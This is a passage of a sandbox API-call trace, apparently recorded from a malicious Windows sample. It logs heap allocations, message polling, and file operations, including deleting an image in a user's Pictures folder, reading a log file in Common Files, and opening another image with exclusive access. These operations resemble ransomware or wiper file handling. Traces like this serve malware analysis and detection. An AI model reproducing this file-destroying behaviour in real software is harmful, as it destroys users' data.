hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.227] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.227] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.227] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpFilePart=0x0) returned 0x54 [0189.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0x1603bac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0x90ae18 [0189.228] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\cnlxkqk1zng.bmp")) returned 1 [0189.230] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0x1603bac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0 [0189.230] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0189.233] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0189.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.236] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0189.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0189.236] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0189.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0189.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0189.237] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.238] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0189.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.238] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.239] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.239] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.239] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.239] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.239] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.239] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.239] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.239] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2c0e, lpOverlapped=0x0) returned 1 [0189.240] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.240] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2c0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.240] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.240] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.240] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.242] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.242] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.242] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.242] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.242] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.242] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.242] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.242] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\evgfmja.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.243] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0189.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 